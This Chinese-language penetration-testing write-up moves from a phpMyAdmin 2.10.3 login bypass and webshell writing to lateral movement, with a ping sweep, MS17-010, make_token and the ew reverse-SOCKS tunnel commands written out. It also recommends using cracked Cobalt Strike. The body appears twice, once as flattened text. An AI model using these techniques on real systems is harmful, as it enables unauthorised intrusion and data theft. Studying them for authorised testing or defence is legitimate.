我遇到的实战渗透
字数 1333 2025-08-25 22:58:34

PHPMyAdmin渗透测试实战教学文档

信息收集阶段

1. 基础信息收集

  • 网站扫描工具:使用https://scan.top15.cn/web/等在线扫描工具获取网站基本信息
  • 操作系统识别
    • Windows对URL大小写不敏感,Linux敏感
    • 使用火狐插件辅助判断
  • 端口探测:重点关注443端口(HTTPS服务)

2. PHPMyAdmin发现与利用

  • 发现版本:2.10.3
  • 漏洞利用步骤
    1. 尝试万能密码:'localhost'@'@'
    2. 成功登录后尝试两种getshell方法:
    • into outfile直接写文件(可能因权限问题失败)
    • 利用MySQL日志文件重命名写入shell(低版本可能不支持)

3. 绝对路径获取方法

  • 尝试访问以下路径:
    phpMyAdmin/libraries/select_lang.lib.php
    phpMyAdmin/darkblue_orange/layout.inc.php
    phpMyAdmin/index.php?lang[]=1
    phpmyadmin/themes/darkblue_orange/layout.inc.php
    
  • 其他方法:
    • 查看phpinfo信息
    • 使用Google语法搜索
    • 通过Google镜像站搜索

外网渗透阶段

1. Webshell上传与管理

  • 使用蚁剑、菜刀等工具连接webshell
  • 注意disable_functions限制
  • 回显问题处理:
    • 初始有回显,后续可能消失但命令仍可执行
    • 尝试重新上传webshell

2. 服务器安全措施

  • 修改默认SSH端口防止爆破
  • 使用screen保持会话
  • 服务器环境:阿里云学生机

内网渗透阶段

1. 横向移动准备

  • 环境判断

    • 检查是否为域环境(systeminfo查看)
    • 注意假域环境(工作组修改名称可能混淆)
  • 权限检查

    • 提权至最高权限(已获取system权限)
    • 检查是否为域用户会话

2. 内网信息收集

  • 存活主机探测

    for /l %i in (1,1,255) do @ ping 192.168.124.%i -w 1 -n 1|find /i "ttl="
    
    • 使用nbtscan扫描内网存活IP及目标所属
  • 端口扫描与服务识别

    • 浏览器代理访问内网服务
    • 检查是否有端口转发/NAT

3. 横向渗透技术

  1. 凭证利用

    • 使用已获取的管理密码尝试登录其他系统
    • 尝试make_token仿冒域用户
  2. 漏洞利用

    • MS17-010(永恒之蓝)漏洞尝试
    • 其他已知漏洞利用
  3. 代理设置

    • 使用CS建立sock4代理
    • ew工具设置:
      # 目标机
      ew_win32.exe -s rssocks -d x.x.x.x -e 1024
      # 公网服务器
      ./ew_linux_x64 -s rcsocks -l 1024 -e 1080 &
      
    • 配合proxifier使用
  4. CS插件推荐

    • 使用https://www.codercto.com/a/57741.html提供的插件脚本

常见问题与解决方案

1. CS会话不稳定

  • 可能原因:破解版不完全
  • 解决方案:使用完全破解版本

2. 命令执行无回显

  • 可能原因:disable_functions限制
  • 解决方案:
    • 尝试不同webshell
    • 使用其他执行方式(如日志写入)

3. 域环境判断错误

  • 注意区分真实域环境与工作组环境
  • 验证方法:
    • 尝试执行域命令
    • 检查域控IP是否存在

防御措施

  1. PHPMyAdmin防护

    • 及时更新版本
    • 限制访问IP
    • 使用强密码
  2. 内网防护

    • 定期更改管理密码
    • 监控异常登录
    • 限制横向移动路径
  3. 日志监控

    • 关注异常文件创建
    • 监控可疑进程

总结

本案例展示了从外网PHPMyAdmin漏洞利用到内网横向移动的完整渗透流程,重点包括:

  1. 信息收集的全面性与准确性
  2. PHPMyAdmin低版本漏洞利用技巧
  3. 内网环境判断与横向移动方法
  4. 代理工具的使用与CS框架应用

注意:本文仅用于教学研究,严禁用于非法用途。实际操作中请遵守法律法规,获得授权后进行测试。

PHPMyAdmin渗透测试实战教学文档 信息收集阶段 1. 基础信息收集 网站扫描工具 :使用https://scan.top15.cn/web/等在线扫描工具获取网站基本信息 操作系统识别 : Windows对URL大小写不敏感,Linux敏感 使用火狐插件辅助判断 端口探测 :重点关注443端口(HTTPS服务) 2. PHPMyAdmin发现与利用 发现版本:2.10.3 漏洞利用步骤 : 尝试万能密码: 'localhost'@'@' 成功登录后尝试两种getshell方法: into outfile 直接写文件(可能因权限问题失败) 利用MySQL日志文件重命名写入shell(低版本可能不支持) 3. 绝对路径获取方法 尝试访问以下路径: 其他方法: 查看phpinfo信息 使用Google语法搜索 通过Google镜像站搜索 外网渗透阶段 1. Webshell上传与管理 使用蚁剑、菜刀等工具连接webshell 注意disable_ functions限制 回显问题处理: 初始有回显,后续可能消失但命令仍可执行 尝试重新上传webshell 2. 服务器安全措施 修改默认SSH端口防止爆破 使用screen保持会话 服务器环境:阿里云学生机 内网渗透阶段 1. 横向移动准备 环境判断 : 检查是否为域环境(systeminfo查看) 注意假域环境(工作组修改名称可能混淆) 权限检查 : 提权至最高权限(已获取system权限) 检查是否为域用户会话 2. 内网信息收集 存活主机探测 : 使用nbtscan扫描内网存活IP及目标所属 端口扫描与服务识别 : 浏览器代理访问内网服务 检查是否有端口转发/NAT 3. 横向渗透技术 凭证利用 : 使用已获取的管理密码尝试登录其他系统 尝试make_ token仿冒域用户 漏洞利用 : MS17-010(永恒之蓝)漏洞尝试 其他已知漏洞利用 代理设置 : 使用CS建立sock4代理 ew工具设置: 配合proxifier使用 CS插件推荐 : 使用https://www.codercto.com/a/57741.html提供的插件脚本 常见问题与解决方案 1. CS会话不稳定 可能原因:破解版不完全 解决方案:使用完全破解版本 2. 命令执行无回显 可能原因:disable_ functions限制 解决方案: 尝试不同webshell 使用其他执行方式(如日志写入) 3. 域环境判断错误 注意区分真实域环境与工作组环境 验证方法: 尝试执行域命令 检查域控IP是否存在 防御措施 PHPMyAdmin防护 : 及时更新版本 限制访问IP 使用强密码 内网防护 : 定期更改管理密码 监控异常登录 限制横向移动路径 日志监控 : 关注异常文件创建 监控可疑进程 总结 本案例展示了从外网PHPMyAdmin漏洞利用到内网横向移动的完整渗透流程,重点包括: 信息收集的全面性与准确性 PHPMyAdmin低版本漏洞利用技巧 内网环境判断与横向移动方法 代理工具的使用与CS框架应用 注意:本文仅用于教学研究,严禁用于非法用途。实际操作中请遵守法律法规,获得授权后进行测试。